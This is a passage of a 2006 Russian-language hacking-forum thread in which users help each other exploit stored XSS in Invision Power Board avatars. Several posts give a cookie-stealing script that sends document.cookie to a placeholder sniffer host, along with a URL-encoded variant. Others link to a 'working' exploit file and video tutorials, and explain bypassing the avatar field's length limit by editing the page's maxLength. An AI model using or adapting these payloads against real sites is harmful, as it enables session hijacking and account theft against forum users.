ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #41  
Старый 28.04.2006, 11:35
BUTUZ
Новичок
Регистрация: 26.01.2006
Сообщений: 9
Провел на форуме:
120967

Репутация: 0
Отправить сообщение для BUTUZ с помощью ICQ
По умолчанию

не проходит этот скрипт
Код HTML:
<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

форум http://no-links.com/

Последний раз редактировалось Azazel; 21.05.2006 в 11:54..
 
Ответить с цитированием

  #42  
Старый 28.04.2006, 22:45
1SeTh
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
Провел на форуме:
2406659

Репутация: 34
По умолчанию

Цитата:
Сообщение от CinerX  
Ни чего не понял! Как же тогда она открывается как аватара, если она закачивается???
Я же объяснил что работает только почему то на локалке
 
Ответить с цитированием

  #43  
Старый 29.04.2006, 01:33
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

Цитата:
Сообщение от BUTUZ  
не проходит этот скрипт
Код HTML:
<script>
img = new Image();
img.src = "http://адресс_снифера?"+document.cookie;
</script>

форум http://no-links.com/
Он полюбому не пройдет... Читай весь топик! И внимательней!

Последний раз редактировалось Azazel; 21.05.2006 в 11:54..
 
Ответить с цитированием

  #44  
Старый 29.04.2006, 03:23
BUTUZ
Новичок
Регистрация: 26.01.2006
Сообщений: 9
Провел на форуме:
120967

Репутация: 0
Отправить сообщение для BUTUZ с помощью ICQ
По умолчанию

Цитата:
Сообщение от CinerX  
Он полюбому не пройдет... Читай весь топик! И внимательней!

<script>
img%20=%20new%20Image()%3B
img.src%20=%20%22http://адрес?%22%3F+document.cookie%3B
</script>

сорри, забыл перекодировать но и такое тож не прохордит
 
Ответить с цитированием

  #45  
Старый 30.04.2006, 01:22
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

Этот код все равно не сработает. Т.к. ты не зашифровал еще много чего...

Вот мой рабочий
Если IPB 2.1.4 то вот:
http://dreamshell.h16.ru/hack/cookie_avatar_ipb.txt
Если IPB 2.1.5 то ставь как аватару, предварительно убрав [IMG]
 
Ответить с цитированием

  #46  
Старый 30.04.2006, 17:06
BUTUZ
Новичок
Регистрация: 26.01.2006
Сообщений: 9
Провел на форуме:
120967

Репутация: 0
Отправить сообщение для BUTUZ с помощью ICQ
По умолчанию

эт как как аватару???
 
Ответить с цитированием

  #47  
Старый 01.05.2006, 16:02
Sanyk36
Новичок
Регистрация: 20.04.2006
Сообщений: 5
Провел на форуме:
108775

Репутация: 0
По умолчанию

Цитата:
Сообщение от BUTUZ  
эт как как аватару???
Вот кино, как в аватару xss вставить:
http://rapidshare.de/files/19344213/...vatar.rar.html
 
Ответить с цитированием

  #48  
Старый 02.05.2006, 01:33
CinerX
Познающий
Регистрация: 13.02.2006
Сообщений: 82
Провел на форуме:
539650

Репутация: 37
По умолчанию

Цитата:
Вот кино, как в аватару xss вставить:
Ввобще-то я в этой теме уже выкладывал видео на примере DamageLab:
_http://dreamshell.h16.ru/hack/damagelab.rar
 
Ответить с цитированием

  #49  
Старый 07.05.2006, 13:53
nix
Banned
Регистрация: 07.05.2006
Сообщений: 36
Провел на форуме:
96196

Репутация: -9
По умолчанию

А как чтобы на снифер отсылало зделать, тамж ведь ограничение стоит на длину...
 
Ответить с цитированием

  #50  
Старый 07.05.2006, 14:11
ZetRoX
Познающий
Регистрация: 04.12.2005
Сообщений: 52
Провел на форуме:
184032

Репутация: 1
По умолчанию

все просто...заходишь в свой профиль....--> сменить аватарку.....сохраняешь эту страницу у себя на компе....(файл сохранить как....)....открываешь эту страницу блокнотом....ближе к концу находишь надпись (по-русски) "Введите ссылку на файл Вашего аватара".....ниже видишь строчку.....maxLength=80.....вместо 80 делаешь 300, например, maxLength=300.....и сохраняешь файл....открываешь броузером и теперь у тебя стоит ограничение на 300 символов...

для прописи кода тебе хватит сполна....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Invision 1.3 Xss ? slider Форумы 6 01.06.2006 13:01
Уязвимость Invision Power Board 2.1.5 Go0o$E Форумы 106 05.05.2006 21:35
Active XSS in Invision Power Board 2.1.4 k00p3r Уязвимости 8 03.03.2006 20:51
Вопрос по использованию XSS на Powered by Invision Power Board(U) v1.3 Final rsha1988 Форумы 12 15.02.2005 01:44



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ